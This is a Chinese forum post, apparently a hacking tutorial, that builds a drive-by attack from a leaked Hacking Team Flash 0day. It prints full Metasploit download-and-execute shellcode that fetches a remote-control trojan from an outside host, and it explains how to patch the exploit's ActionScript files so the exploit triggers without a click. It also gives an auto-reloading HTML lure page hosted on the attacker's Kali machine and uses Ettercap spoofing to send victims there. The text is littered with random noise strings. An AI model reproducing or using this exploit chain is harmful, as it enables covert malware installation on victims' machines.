flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

" G* j4 `! h+ ~, u 三、flash 0day之手工代码修改制作下载者实例入侵演示 9 @9 l. z& |: W

9 J' R' g; S0 Q* [: T 利用到的工具： 9 S( ]; u7 {( y5 u0 x4 `

) s- M/ z4 \3 l4 h/ `3 s& C/ V Msf : @3 J1 t- l6 b# M$ [6 {2 d, F# E

0 I, d( F" Z# T% F0 q3 Q7 S5 Z( ~ Ettercap ' a8 w4 A2 m# p0 v1 g

9 T/ h+ _! D9 h7 A Adobe Flash CS6 - Y/ f& G' f" T" d( U- r$ [

# `7 }2 p5 a' ~3 _# J6 L5 m' P Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 6 a/ D N! M% _; V

5 j7 y& n3 b/ V" i7 [, l) k 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options " n- l; S7 f7 O: w* C% v) J

" r, k* _: G, ?' t" n 如图： * H$ u/ Y4 ^: D

: s1 L# c+ t" j" h, N: {2 t t l2 Q3 u5 T& _2 }

# F/ D$ s8 ?& Y! r5 H ) t7 O, g, F2 x- c6 K1 t8 ^' M" l

. d: u; b. |) F1 U$ [9 A 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: ' t0 ~# y: ]- Z/ u

8 b7 R2 c7 E" H1 m ' V; Q* l5 e l$ b2 t t9 B

; N9 \" J. e! [, u% t + U4 \3 u7 E4 c3 C8 I) n) K6 Z

5 _4 q5 y9 K& m* a0 @. k" s9 s 然后执行generate -t dword生成shellcode，如下： 3 {- U4 G6 a$ D) H3 [" ~! I! k

2 t/ F! x9 q+ U9 B" \+ } ) o1 {: f" p8 K( w

! H+ D# ]5 B7 M- v3 y 复制代码到文本下便于我们一会编辑flash exp，如下： - I# |$ P- Z- R- |' g

& ^9 F' P5 B0 o3 q; d( r 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, / \/ d3 D" c& H, t) J! o

6 Z b: i! h1 d; o' @. L 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, . F- }3 }6 Z) X5 d0 Q- Z8 X' q: n

/ p$ A3 z y2 c" y" _ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, - L$ h% r- b! p7 g4 I2 j

; l+ s! W, Z0 i: {) }, J& @ 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 M1 @0 D' [" d2 j& N9 `

1 J* l1 N0 n' D& @9 x, _ 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ; y1 O9 V, Q) t3 y

+ W' y( t; F! [% Y& Q 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, " A' v$ Q: G- |- X" l

% x. Y) X. k, }& `. d$ p 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 0 F( Q% {% k7 V2 e: q- f

, u5 t& V; g n1 }; \" g 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ; H8 k1 t* f! q% o" e, _8 m) Q5 w

& T& ^( o7 n$ c7 Y' ] 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, / H% A. W# P! ~

* ~; h, [, U- h: U 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, / K. C8 {3 `3 L! z

0 _2 `0 A0 ^; w+ h; t1 m! ~% M 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, + t- T; {9 E" K) M ?; X9 n! T" z

# w; A: x# k R6 [, u 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ) K+ y3 c' g: _; S- s4 _& q

1 f9 R& @' z* A* _$ ~! T/ n 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 6 E6 p; D$ l1 b8 }" Y) P

: g5 d- W$ ~8 ]# ~) u9 }# Y! t& K _ 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 6 Y" r- E; B9 }. N# S

( E9 a+ \+ y& [7 w5 L7 D 4 Z8 l- b' }7 n) t" G7 y

1 c4 P# p% s$ I% C k # a4 a7 U+ V; W4 q( v, S

' F- a v. l6 a$ Q- W7 W7 D 下面我们来修改flash 0day exp，需要修改三个文件，分别为： 9 \6 F8 L2 f& l, }6 l! l

' X# [: K7 X) |' h' y7 D% D 6 }4 p4 O! b. v0 b7 l. w2 a

' n8 P8 Y( N7 O) k7 _ 先修改ShellWin32.as，部分源代码如图： 1 f) [8 i4 S6 t/ B/ R( ]

4 W! Z% O; o8 z Z. ^( |- O" g 3 d& j& p! q- y: k. o

+ g3 r% f( N" N 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： ! w0 L. r; I% B* J# T

7 A+ c8 v9 b! w& S9 H: z ~ X3 {+ a8 B+ _; d% w4 U* v' G0 `

7 V! Y5 x c4 ~. Y! e' }7 ]3 D0 W 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： " [9 K! J! M3 v. Q! g

& W: k& h5 H" ` . N+ a9 o% f% O4 D2 W

/ v- S7 u8 ~7 Z) @! @/ K/ w9 l 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： / M: j9 A& n0 l- G8 U# h

; \ R4 c' M4 _$ g, G( R5 Q7 g " R0 Y$ P6 n0 z

$ v! [* W9 p# d0 b- w- O l 9 m& `& i% K- |2 ]7 J/ O2 V

+ F( S4 n5 `! K w3 ^ ! a- w' U: W' O; C# \# _# `" Y3 F& Y$ s

0 g7 w3 c0 C& \4 K 然后点保存，下面我们来编译一下，打开 % [ M7 A( C3 H

, ]$ L } L5 r1 O: g exp1.fla然后点文件-发布，看看编译没错误 5 N) a9 W. w: P7 e, N' ?2 D6 u

! j: e7 y2 r7 M( b' `: A6 m ) R+ z! r5 s! m

( ^$ ^& X B( w l2 W2 B6 U8 s0 G/ a; m # L) o' o* c( P' o, o

% Q0 }; M+ T9 A - N0 H. u! M! m1 Y

& T3 s1 ?, J2 A* K7 H0 _ 7 Q, A# \9 v/ y! ^, \7 g2 Q

2 x( h7 U8 L0 ^7 `1 f0 S, r9 a 然后我们把生成的 $ c+ ]( q$ F# }4 h+ [0 ^3 @

/ m# F) \9 }. L( q0 E7 s exp1.swf丢到kailinux 的/var/www/html下： " g5 Q* d8 b, o4 E: ~

/ I' O! u& ?4 b0 U 然后把这段代码好好编辑一下 8 N& o9 X3 r. o1 F* K% k$ E

8 r" F& }2 H% z# }, [; d 0 K9 J4 O& T. A5 S# i. {. M) l+ h

* Z! o$ U1 m7 M4 `1 |' Z) K 1 ]9 B- E- {( P( t1 U! ]4 }: o

6 ^0 P, [; u3 z7 v+ D4 f2 G! ~ $ R( N- _) m+ u5 M8 v$ ^

6 ?. J; C* P+ A$ N% t6 N - u% ?: p! a7 v2 L: k* J$ \- S" p

: h$ H+ l' ^: i% h; M: d0 N% o2 O & L4 l; O. ^ E. Z

# |- u: }' F: M/ I5 D3 d $ y V2 v, Q# ~

, G7 S9 r7 C/ D7 @( l( E <!DOCTYPE html> - q- N" \4 w y6 F' `- i/ h8 t

. w7 e( r! {9 h5 l& u! }: d <html> " y/ |1 t9 A1 J8 {/ H8 \

/ u3 ?2 f+ n g8 X+ L# e3 u. f <head> / a% {; l5 m" @9 {

( R# \9 e0 G( F4 u+ v; m8 \; n <meta http-equiv="Content-Type" content="text/html; " K- s' K: z* Z4 U& N3 @5 f$ U, }

; J4 a G3 h, p4 f. x9 R charset=utf-8"/> 8 @% h$ w# c+ Y

' R1 Y( ~; y- G9 D( K </head> . o0 M3 W3 k, @3 k2 _$ R' W9 c

8 G0 b" k+ G0 z" P0 k0 [5 p6 j <body> 9 I( `! N/ @$ f

0 h4 V3 }3 {/ y) K! P/ J <h2> Please wait, the requested page is loading...</h2> 5 K$ i+ V. R+ |' b# c- ~6 x( g

1 l2 |' S" ^3 g+ J <br> % F4 I# U; J2 s4 o. w3 F

- @8 K4 f1 s6 Z+ L8 a/ }' R3 D <OBJECT ) n7 T" V' S0 X& o8 \

/ p, R" X* T0 m. }+ R classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie & ?1 z3 Y9 M0 S5 P' D% O9 n

5 y. l. [3 U, u VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 1 ~8 e+ L- S! Q* [

# Z! f L( d; W0 |! @ </body> 8 i. b9 c/ P6 N) ?. W# n/ B

( _% u+ {% _$ d$ G <script> # F2 u2 Z; H0 V1 J" K( Z/ c! D

3 }: I7 Q( j6 K d/ _6 x9 y setTimeout(function () { |) n& ]1 E$ c r' O. I

q) ~8 x' O% Q l 7 n' g! ^* G0 u ~2 N

5 ?; ?0 t# t9 z) L2 ~ window.location.reload(); 1 _) @" E J+ T& p! }. u

; b, z- j" x& ?7 P+ B }, 10000); ' m9 b. a0 R9 p8 `% O6 D0 J

+ v1 @1 G) z5 N- C! @) D! T & P' y8 A j: Y

, B+ Z/ i/ {1 E8 N7 f6 P </script> ! j& W( Z# G1 T- f! [

+ G" D5 ^# u$ _9 R- l6 [ </html> # o( {1 \) e5 T* v

# B3 ~% m% a- \ 9 C" `3 a. b: i9 C. M( d

3 _6 R1 Z8 D7 I* G' s# ] 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： 7 _3 K& d- L1 S) G4 X" Q

2 @% W1 A; ?# Z4 F1 _+ T ( |6 S$ P" F9 S# |2 W1 K% b% @

! l5 T4 f/ E( A+ o0 {. m 2 n+ ^4 d; R9 T4 l# n" D

: r4 O+ c4 l% d$ w% o 4 l& U& M3 \) `4 Y2 m! u

2 _2 j0 {8 G5 `' q2 {. K; G5 h% _4 u 6 w: e' W+ x6 O. }8 L

1 N( C% B2 G/ k$ _/ y9 I$ } 8 q9 S- Q" P' N

6 g G: y( }+ t# e* l 下面我们用ettercap欺骗如图： ) x7 w- r$ }/ x2 n5 s# {+ n9 M" m

4 Q O8 E+ v+ i4 @$ s; G* T' R - H+ T, j7 ` G

/ m5 t" C6 l, w4 R' H; J% t - r5 W! o, o3 {+ w* l% I! {) x

3 M* x4 E0 z+ Y+ {' M/ l! x 下面我们随便访问个网站看看： 4 H9 n6 Q5 n( P

$ Y5 S9 T/ u+ i! d. z" T+ ~ 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： 2 t3 I6 W7 {) H% j1 Q' ?

; q# {5 v% p: E" |2 v' ` 2 `5 d m, m5 q0 _

% E! n: k" _# c- r 我们看另一台， 2 C1 Q T! C2 s/ A r; b; P/ v

! Y A0 n/ x* M; R 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 & }# k" f( y2 L

		自动登录	找回密码
密码			立即注册